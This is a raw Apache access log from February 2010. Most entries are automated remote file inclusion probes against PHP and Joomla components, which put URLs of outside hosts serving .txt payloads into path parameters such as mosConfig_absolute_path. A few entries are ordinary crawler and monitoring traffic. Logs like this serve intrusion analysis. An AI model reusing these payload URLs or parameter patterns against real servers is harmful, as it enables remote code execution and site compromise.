186.28.232.13 - - [23/Feb/2010:00:48:14 -0500] "GET /logs/access_log.Q109112400//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
200.150.6.42 - - [23/Feb/2010:00:48:43 -0500] "GET /logs/access_log.Q109072900%20%20/e404.php?DOCUMENT_ROOT=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:00:48:43 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:00:48:43 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:00:49:13 -0500] "GET /logs/access_log.Q109122900%20%20/e404.php?DOCUMENT_ROOT=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
201.28.110.99 - - [23/Feb/2010:00:49:38 -0500] "GET /errors.php?error=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
201.28.110.99 - - [23/Feb/2010:00:49:38 -0500] "GET /logs/access_log.Q109071400%20%20/errors.php?error=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.28.110.99 - - [23/Feb/2010:00:49:38 -0500] "GET /logs/errors.php?error=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.28.110.99 - - [23/Feb/2010:00:50:04 -0500] "GET /logs/access_log.Q109081000%20%20/errors.php?error=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:00:51:44 -0500] "GET /logs/access_log.Q109081600//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:00:51:44 -0500] "GET /logs/access_log.Q109072400//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.211.138.220 - - [23/Feb/2010:00:51:58 -0500] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
216.211.138.220 - - [23/Feb/2010:00:51:58 -0500] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.hochsauerlandferien.de/nw/data/images/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Feb/2010:00:52:00 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
119.73.52.200 - - [23/Feb/2010:00:52:07 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
119.73.52.200 - - [23/Feb/2010:00:52:07 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
119.73.52.200 - - [23/Feb/2010:00:52:15 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
119.73.52.200 - - [23/Feb/2010:00:52:15 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)"
74.50.85.229 - - [23/Feb/2010:00:52:19 -0500] "GET /logs/access_log.Q109072400//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:00:52:20 -0500] "GET /logs/access_log.Q109081600//skin/zero_vote/error.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
76.240.55.226 - - [23/Feb/2010:00:53:02 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
76.240.55.226 - - [23/Feb/2010:00:53:02 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
76.240.55.226 - - [23/Feb/2010:00:53:02 -0500] "GET /logs/access_log.Q109120400%20%20//skin/zero_vote/ask_password.php?dir=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
211.232.45.121 - - [23/Feb/2010:00:53:25 -0500] "GET //skin/zero_vote/error.php?dir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
211.232.45.121 - - [23/Feb/2010:00:53:25 -0500] "GET /logs/access_log.Q109081600//skin/zero_vote/error.php?dir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.232.45.121 - - [23/Feb/2010:00:53:25 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.232.45.121 - - [23/Feb/2010:00:53:26 -0500] "GET /logs/access_log.Q109072400//skin/zero_vote/error.php?dir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.232.45.121 - - [23/Feb/2010:00:53:58 -0500] "GET /logs/access_log.Q109092100//skin/zero_vote/error.php?dir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
211.232.45.121 - - [23/Feb/2010:00:53:58 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
211.232.45.121 - - [23/Feb/2010:00:53:58 -0500] "GET //skin/zero_vote/error.php?dir=http://www.vmtubes.com.cn/footer?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:00:54:02 -0500] "GET /admin/business_inc/saveserver.php?thisdir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:00:54:02 -0500] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:00:54:02 -0500] "GET /logs/access_log.Q109072600/admin/business_inc/saveserver.php?thisdir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:00:54:11 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 248 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:00:54:11 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 243 "-" "Microsoft Pocket Internet Explorer/0.6"
211.108.61.176 - - [23/Feb/2010:00:54:18 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=ur%20url%20spread??? HTTP/1.1" 404 258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
211.108.61.176 - - [23/Feb/2010:00:54:19 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=ur%20url%20spread??? HTTP/1.1" 404 253 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
211.108.61.176 - - [23/Feb/2010:00:54:20 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
211.108.61.176 - - [23/Feb/2010:00:54:22 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 253 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
210.51.24.102 - - [23/Feb/2010:00:54:33 -0500] "GET /logs/access_log.Q110021000/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.3hdigital.com/do.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
210.51.24.102 - - [23/Feb/2010:00:54:33 -0500] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.3hdigital.com/do.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.65"
210.51.24.102 - - [23/Feb/2010:00:54:33 -0500] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.3hdigital.com/do.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
200.150.6.42 - - [23/Feb/2010:00:54:41 -0500] "GET /logs/access_log.Q110012300/admin/business_inc/saveserver.php?thisdir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
124.136.23.172 - - [23/Feb/2010:00:54:47 -0500] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
124.136.23.172 - - [23/Feb/2010:00:54:47 -0500] "GET /logs/access_log.Q109121100%20%20/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.136.23.172 - - [23/Feb/2010:00:54:47 -0500] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
65.55.106.133 - - [23/Feb/2010:00:54:57 -0500] "GET /robots.txt HTTP/1.1" 404 208 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.231.24.246 - - [23/Feb/2010:00:55:11 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hetweeshuis.nl/images/stories/beat/1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
222.231.24.246 - - [23/Feb/2010:00:55:12 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hetweeshuis.nl/images/stories/beat/1.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.231.24.246 - - [23/Feb/2010:00:55:13 -0500] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hetweeshuis.nl/images/stories/beat/1.txt???? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.231.24.246 - - [23/Feb/2010:00:55:13 -0500] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.hetweeshuis.nl/images/stories/beat/1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
65.55.106.133 - - [23/Feb/2010:00:56:03 -0500] "GET /CGI-BIN/LANSAWEB?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):DDCSRCH+RNDIV(S0040):1+RNCLAS(S0040):8 HTTP/1.1" 200 64811 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
201.28.110.99 - - [23/Feb/2010:00:57:23 -0500] "GET /logs/errors.php?error=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
201.28.110.99 - - [23/Feb/2010:00:57:24 -0500] "GET /logs/access_log.Q109071400%20%20/errors.php?error=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
201.28.110.99 - - [23/Feb/2010:00:57:24 -0500] "GET /errors.php?error=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.51.24.102 - - [23/Feb/2010:00:57:34 -0500] "GET /logs/access_log.Q109062700/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.3hdigital.com/do.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
201.28.110.99 - - [23/Feb/2010:00:57:47 -0500] "GET /logs/access_log.Q109081000%20%20/errors.php?error=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:00:59:12 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 248 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:00:59:12 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 243 "-" "Microsoft Pocket Internet Explorer/0.6"
222.231.24.246 - - [23/Feb/2010:01:00:01 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.hetweeshuis.nl/images/stories/beat/1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.231.24.246 - - [23/Feb/2010:01:00:01 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.hetweeshuis.nl/images/stories/beat/1.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.231.24.246 - - [23/Feb/2010:01:00:01 -0500] "GET /logs/access_log.Q109071400/components/com_simpleboard/image_upload.php?sbp=http://www.hetweeshuis.nl/images/stories/beat/1.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Feb/2010:01:00:02 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
222.231.24.246 - - [23/Feb/2010:01:00:07 -0500] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.hetweeshuis.nl/images/stories/beat/1.txt???? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
222.231.24.246 - - [23/Feb/2010:01:00:07 -0500] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.hetweeshuis.nl/images/stories/beat/1.txt???? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
222.231.24.246 - - [23/Feb/2010:01:00:12 -0500] "GET /logs/access_log.Q109071400/components/com_simpleboard/image_upload.php?sbp=http://www.hetweeshuis.nl/images/stories/beat/1.txt???? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
88.84.137.160 - - [23/Feb/2010:01:00:54 -0500] "GET //administrator/components/com_jcs/jcs.function.php?mosConfig.absolute.path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 404 248 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
88.84.137.160 - - [23/Feb/2010:01:00:54 -0500] "GET /logs//administrator/components/com_jcs/jcs.function.php?mosConfig.absolute.path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 404 253 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
122.201.102.68 - - [23/Feb/2010:01:01:22 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://free-awaz.com/islam/main/robot.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
122.201.102.68 - - [23/Feb/2010:01:01:22 -0500] "GET //include/admin.lib.inc.php?site_path=http://free-awaz.com/islam/main/robot.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
122.201.102.68 - - [23/Feb/2010:01:01:29 -0500] "GET /logs/access_log.Q109091600%20%20//include/admin.lib.inc.php?site_path=http://free-awaz.com/islam/main/robot.txt???? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:01:39 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:01:39 -0500] "GET /logs/access_log.Q110011600%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:01:39 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:01:01:56 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 248 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:01:01:56 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 243 "-" "Microsoft Pocket Internet Explorer/0.6"
74.50.85.229 - - [23/Feb/2010:01:02:07 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:02:07 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:02:07 -0500] "GET /logs/access_log.Q110011600%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:02:10 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:02:10 -0500] "GET /logs/access_log.Q110011600%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:02:10 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
122.201.102.68 - - [23/Feb/2010:01:02:20 -0500] "GET //include/admin.lib.inc.php?site_path=http://free-awaz.com/islam/main/robot.txt???? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
122.201.102.68 - - [23/Feb/2010:01:02:20 -0500] "GET /logs/access_log.Q109091600//include/admin.lib.inc.php?site_path=http://free-awaz.com/islam/main/robot.txt???? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
122.201.102.68 - - [23/Feb/2010:01:02:25 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://free-awaz.com/islam/main/robot.txt???? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:02:44 -0500] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:02:44 -0500] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:02:44 -0500] "GET /logs/access_log.Q109070700/components/com_performs/performs.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:02:53 -0500] "GET /logs/access_log.Q109062700/components/com_performs/performs.php?mosConfig_absolute_path=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
61.111.3.35 - - [23/Feb/2010:01:03:15 -0500] "GET /bemarket/postscript/postscript.php?p_mode=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
61.111.3.35 - - [23/Feb/2010:01:03:17 -0500] "GET /logs/bemarket/postscript/postscript.php?p_mode=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:03:58 -0500] "GET /logs/access_log.Q109072600/admin/business_inc/saveserver.php?thisdir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:03:58 -0500] "GET /logs/access_log.Q110012300/admin/business_inc/saveserver.php?thisdir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:03:58 -0500] "GET /logs/admin/business_inc/saveserver.php?thisdir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:04:01 -0500] "GET /admin/business_inc/saveserver.php?thisdir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:04:37 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:04:37 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:04:38 -0500] "GET /logs/access_log.Q110011600%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:04:53 -0500] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:04:53 -0500] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
74.50.85.229 - - [23/Feb/2010:01:04:54 -0500] "GET /logs/access_log.Q110011600%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://snia2009.com/components/com_jce/zfxid1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
211.108.61.176 - - [23/Feb/2010:01:05:23 -0500] "GET //skin/zero_vote/error.php?dir=ur%20url%20spread??? HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
211.108.61.176 - - [23/Feb/2010:01:05:23 -0500] "GET /logs//skin/zero_vote/error.php?dir=ur%20url%20spread??? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
211.108.61.176 - - [23/Feb/2010:01:05:24 -0500] "GET //skin/zero_vote/error.php?dir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 223 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
211.108.61.176 - - [23/Feb/2010:01:05:24 -0500] "GET /logs//skin/zero_vote/error.php?dir=http://kaizo.hut2.ru/new/test.txt??? HTTP/1.1" 404 228 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
66.254.98.142 - - [23/Feb/2010:01:05:40 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 248 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:01:05:40 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 243 "-" "Microsoft Pocket Internet Explorer/0.6"
200.93.147.154 - - [23/Feb/2010:01:07:45 -0500] "GET /logs/access_log.Q109072600%20%20/admin/business_inc/saveserver.php?thisdir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:07:45 -0500] "GET /logs/access_log.Q110012300%20%20/admin/business_inc/saveserver.php?thisdir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Feb/2010:01:08:03 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
112.203.109.74 - - [23/Feb/2010:01:08:14 -0500] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.18) Gecko/2010020219 Firefox/3.0.18"
112.203.109.74 - - [23/Feb/2010:01:08:14 -0500] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.18) Gecko/2010020219 Firefox/3.0.18"
112.203.109.74 - - [23/Feb/2010:01:08:17 -0500] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.18) Gecko/2010020219 Firefox/3.0.18"
112.203.109.74 - - [23/Feb/2010:01:08:17 -0500] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.18) Gecko/2010020219 Firefox/3.0.18"
80.23.181.2 - - [23/Feb/2010:01:08:20 -0500] "GET /logs/index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
80.23.181.2 - - [23/Feb/2010:01:08:20 -0500] "GET /index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
80.23.181.2 - - [23/Feb/2010:01:08:20 -0500] "GET /logs/access_log.Q109051000/index.php?option=com_zoom&Itemid=&mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:08:53 -0500] "GET /logs/access_log.Q109102900/admin/business_inc/saveserver.php?thisdir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:09:11 -0500] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:09:13 -0500] "GET /logs/access_log.Q109071400//components/com_simpleboard/image_upload.php?sbp=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
